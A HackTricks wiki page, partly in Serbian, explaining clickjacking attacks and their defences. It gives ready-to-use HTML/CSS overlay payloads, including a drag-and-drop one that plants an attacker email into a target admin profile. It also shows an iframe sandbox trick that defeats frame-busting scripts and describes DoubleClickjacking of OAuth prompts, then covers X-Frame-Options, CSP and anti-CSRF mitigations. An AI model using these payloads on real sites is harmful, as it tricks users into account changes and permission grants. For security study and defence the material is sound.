Clickjacking

Reading time: 9 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Šta je Clickjacking

U clickjacking napadu, korisnik biva prevaren da klikne na element na veb-stranici koji je ili nevidljiv ili maskiran kao drugi element. Ova manipulacija može dovesti do neželjenih posledica po korisnika, kao što su preuzimanje malware-a, preusmeravanje na zlonamerne veb-stranice, otkrivanje kredencijala ili osetljivih informacija, transferi novca ili kupovina proizvoda putem interneta.

Trik sa predpopunjavanjem formi

Ponekad je moguće popuniti vrednosti polja forme korišćenjem GET parametara prilikom učitavanja stranice. Napadač može zloupotrebiti ovo ponašanje da popuni formu proizvoljnim podacima i pošalje clickjacking payload tako da korisnik pritisne dugme Submit.

Popunjavanje forme pomoću Drag&Drop

Ako treba da korisnik popuni formu, ali ne želite da ga direktno pitate da unese neke specifične podatke (kao email i/ili specifičnu lozinku koju znate), možete ga jednostavno zamoliti da Drag&Drop nešto što će upisati vaše kontrolisane podatke, kao u this example.

Osnovni Payload

css

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Višeetapni payload

css

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Drag&Drop + Click payload

css

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

If you have identified an XSS attack that requires a user to click on some element to trigger the XSS and the page is vulnerable to clickjacking, you could abuse it to trick the user into clicking the button/link.
Example:
You found a self XSS in some private details of the account (details that only you can set and read). The page with the form to set these details is vulnerable to Clickjacking and you can prepopulate the form with the GET parameters.
An attacker could prepare a Clickjacking attack to that page prepopulating the form with the XSS payload and tricking the user into Submit the form. So, when the form is submitted and the values are modified, the user will execute the XSS.

DoubleClickjacking

Firstly explained in this post, this technique would ask the victim to double click on a button of a custom page placed in a specific location, and use the timing differences between mousedown and onclick events to load the victim page duing the double click so the victim actually clicks a legit button in the victim page.

An example could be seen in this video: https://www.youtube.com/watch?v=4rGvRRMrD18

A code example can be found in this page.

warning

This technique allows to trick the user to click on 1 place in the victim page bypassing every protection against clickjacking. So the attacker needs to find sensitive actions that can be done with just 1 click, like OAuth prompts accepting permissions.

Browser extensions: DOM-based autofill clickjacking

Aside from iframing victim pages, attackers can target browser extension UI elements that are injected into the page. Password managers render autofill dropdowns near focused inputs; by focusing an attacker-controlled field and hiding/occluding the extension’s dropdown (opacity/overlay/top-layer tricks), a coerced user click can select a stored item and fill sensitive data into attacker-controlled inputs. This variant requires no iframe exposure and works entirely via DOM/CSS manipulation.

For concrete techniques and PoCs see:

BrowExt - ClickJacking

Strategies to Mitigate Clickjacking

Client-Side Defenses

Scripts executed on the client side can perform actions to prevent Clickjacking:

Ensuring the application window is the main or top window.
Making all frames visible.
Preventing clicks on invisible frames.
Detecting and alerting users to potential Clickjacking attempts.

However, these frame-busting scripts may be circumvented:

Browsers' Security Settings: Some browsers might block these scripts based on their security settings or lack of JavaScript support.
HTML5 iframe sandbox Attribute: An attacker can neutralize frame buster scripts by setting the sandbox attribute with allow-forms or allow-scripts values without allow-top-navigation. This prevents the iframe from verifying if it is the top window, e.g.,

html

<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>

Vrednosti allow-forms i allow-scripts omogućavaju akcije unutar iframe-a dok onemogućavaju navigaciju na gornjem nivou. Da bi se obezbedila predviđena funkcionalnost ciljanog sajta, dodatna dopuštenja poput allow-same-origin i allow-modals mogu biti neophodna, u zavisnosti od tipa napada. Poruke u konzoli pregledača mogu ukazati koja dopuštenja treba dozvoliti.

Odbrane na serverskoj strani

X-Frame-Options

The X-Frame-Options HTTP response header obaveštava pregledač o legitimnosti renderovanja stranice u ili , pomažući u sprečavanju Clickjacking-a:</p> <ul> <li>X-Frame-Options: deny - No domain can frame the content.</li> <li>X-Frame-Options: sameorigin - Only the current site can frame the content.</li> <li>X-Frame-Options: allow-from https://trusted.com - Only the specified 'uri' can frame the page.</li> <li>Note the limitations: if the browser doesn't support this directive, it might not work. Some browsers prefer the CSP frame-ancestors directive.</li> </ul> <h4 id="content-security-policy-csp-frame-ancestors-directive"><a class="header" href="#content-security-policy-csp-frame-ancestors-directive">Content Security Policy (CSP) frame-ancestors directive</a></h4> <p><strong>frame-ancestors directive in CSP</strong> je preporučena metoda za zaštitu od Clickjacking-a:</p> <ul> <li>frame-ancestors 'none' - Similar to X-Frame-Options: deny.</li> <li>frame-ancestors 'self' - Similar to X-Frame-Options: sameorigin.</li> <li>frame-ancestors trusted.com - Similar to X-Frame-Options: allow-from.</li> </ul> <p>For instance, the following CSP only allows framing from the same domain:</p> <p>Content-Security-Policy: frame-ancestors 'self';</p> <p>Dalje detalje i složene primere možete pronaći u <a href="https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors">frame-ancestors CSP documentation</a> i u <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors">Mozilla's CSP frame-ancestors documentation</a>.</p> <h3 id="content-security-policy-csp-with-child-src-and-frame-src"><a class="header" href="#content-security-policy-csp-with-child-src-and-frame-src">Content Security Policy (CSP) with child-src and frame-src</a></h3> <p><strong>Content Security Policy (CSP)</strong> je bezbednosna mera koja pomaže u sprečavanju Clickjacking-a i drugih code injection napada tako što specificira koje izvore pregledač treba da dozvoli za učitavanje sadržaja.</p> <h4 id="frame-src-directive"><a class="header" href="#frame-src-directive">frame-src Directive</a></h4> <ul> <li>Defines valid sources for frames.</li> <li>More specific than the default-src directive.</li> </ul> <pre><code>Content-Security-Policy: frame-src 'self' https://trusted-website.com; </code></pre> <p>Ova politika dozvoljava frames iz istog origin (self) i https://trusted-website.com.</p> <h4 id="child-src-direktiva"><a class="header" href="#child-src-direktiva">child-src direktiva</a></h4> <ul> <li>Uvedena u CSP nivou 2 za postavljanje validnih izvora za web workers i frames.</li> <li>Služi kao fallback za frame-src i worker-src.</li> </ul> <pre><code>Content-Security-Policy: child-src 'self' https://trusted-website.com; </code></pre> <p>Ova politika dozvoljava okvire i workere iz istog porekla (self) i sa https://trusted-website.com.</p> <p><strong>Napomene o upotrebi:</strong></p> <ul> <li>Deprecation: child-src se postepeno ukida u korist frame-src i worker-src.</li> <li>Fallback ponašanje: Ako frame-src nedostaje, child-src se koristi kao fallback za frames. Ako oba nedostaju, koristi se default-src.</li> <li>Strogo definisanje izvora: Uključite samo poverljive izvore u direktive kako biste sprečili eksploataciju.</li> </ul> <h4 id="javascript-skripte-za-sprečavanje-uokviravanja"><a class="header" href="#javascript-skripte-za-sprečavanje-uokviravanja">JavaScript skripte za sprečavanje uokviravanja</a></h4> <p>Iako nisu potpuno nepogrešive, skripte zasnovane na JavaScript-u za sprečavanje uokviravanja mogu se koristiti da bi se sprečilo uokviravanje veb stranice. Primer:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">if (top !== self) { top.location = self.location } </code></pre> <h4 id="korišćenje-anti-csrf-tokens"><a class="header" href="#korišćenje-anti-csrf-tokens">Korišćenje Anti-CSRF tokens</a></h4> <ul> <li><strong>Validacija tokena:</strong> Koristite anti-CSRF tokens u web aplikacijama kako biste osigurali da zahtevi koji menjaju stanje budu namerno pokrenuti od strane korisnika, a ne preko Clickjacked stranice.</li> </ul> <h2 id="reference"><a class="header" href="#reference">Reference</a></h2> <ul> <li><a href="https://portswigger.net/web-security/clickjacking"><strong>https://portswigger.net/web-security/clickjacking</strong></a></li> <li><a href="https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html"><strong>https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html</strong></a></li> <li><a href="https://marektoth.com/blog/dom-based-extension-clickjacking/">DOM-based Extension Clickjacking (marektoth.com)</a></li> </ul> <div class="mdbook-alerts mdbook-alerts-tip"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> tip </p> <p>Učite i vežbajte AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/arte"><strong>HackTricks Training AWS Red Team Expert (ARTE)</strong></a><img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><br /> Učite i vežbajte GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/grte"><strong>HackTricks Training GCP Red Team Expert (GRTE)</strong></a><img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"> Učite i vežbajte Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/azrte"><strong>HackTricks Training Azure Red Team Expert (AzRTE)</strong></a><img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"></p> <details> <summary>Podržite HackTricks</summary> <ul> <li>Proverite <a href="https://github.com/sponsors/carlospolop"><strong>planove pretplate</strong></a>!</li> <li><strong>Pridružite se</strong> 💬 <a href="https://discord.gg/hRep4RUj7f"><strong>Discord grupi</strong></a> ili <a href="https://t.me/peass"><strong>telegram grupi</strong></a> ili <strong>pratite</strong> nas na <strong>Twitteru</strong> 🐦 <a href="https://twitter.com/hacktricks_live"><strong>@hacktricks_live</strong></a><strong>.</strong></li> <li><strong>Podelite hakerske trikove slanjem PR-ova na</strong> <a href="https://github.com/carlospolop/hacktricks"><strong>HackTricks</strong></a> i <a href="https://github.com/carlospolop/hacktricks-cloud"><strong>HackTricks Cloud</strong></a> github repozitorijume.</li> </ul> </details> </div> </main> <nav class="nav-wrapper" aria-label="Page navigation">  <a rel="prev" href="../pentesting-web/cache-deception/cache-poisoning-to-dos.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i> </a> <a rel="next prefetch" href="../pentesting-web/client-side-template-injection-csti.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <i class="fa fa-angle-right"></i> </a> <div style="clear: both"></div> </nav> <nav class="nav-wide-wrapper" aria-label="Page navigation"> <a rel="prev" href="../pentesting-web/cache-deception/cache-poisoning-to-dos.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i><span style="font-size: medium; align-self: center; margin-left: 10px;">Cache Poisoning to DoS</span> </a> <a rel="next prefetch" href="../pentesting-web/client-side-template-injection-csti.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <span style="font-size: medium; align-self: center; margin-right: 10px;">Client Side Template Injection (CSTI)</span><i class="fa fa-angle-right"></i> </a> </nav> </div> <div class="sidetoc"> <div class="sidetoc-wrapper"> <nav class="pagetoc"></nav> <a class="sidesponsor" href="" target="_blank"> <img src="" alt="" srcset=""> <div class="sponsor-title"> </div> <div class="sponsor-description"> </div> <div class="sponsor-cta"></div> </a> </div> </div> </div> <div class="footer"> <div id="theme-wrapper" class="theme-wrapper"> <div id="theme-btns" class="theme-btns"> <button id="hacktricks-light" type="button" role="radio" aria-label="Switch to light theme" aria-checked="false" class="theme"> <i class="fa fa-sun-o"></i> </button> <button id="hacktricks-dark" type="button" role="radio" aria-label="Switch to dark theme" aria-checked="false" class="theme theme-selected"> <i class="fa fa-moon-o"></i> </button> </div> </div> </div> </div> </div> <script> window.playground_copyable = true; </script> <script src="../elasticlunr.min.js"></script> <script src="../mark.min.js"></script>  <script src="../clipboard.min.js"></script> <script src="../highlight.js"></script> <script src="../book.js"></script>  <script src="../theme/pagetoc.js"></script> <script src="../theme/tabs.js"></script> <script src="../theme/ht_searcher.js"></script> <script src="../theme/sponsor.js"></script> <script src="../theme/ai.js"></script>  <script defer src="https://www.fairanalytics.de/pixel/deXeO7BNBrMuhdG1"></script> </div> </body> </html>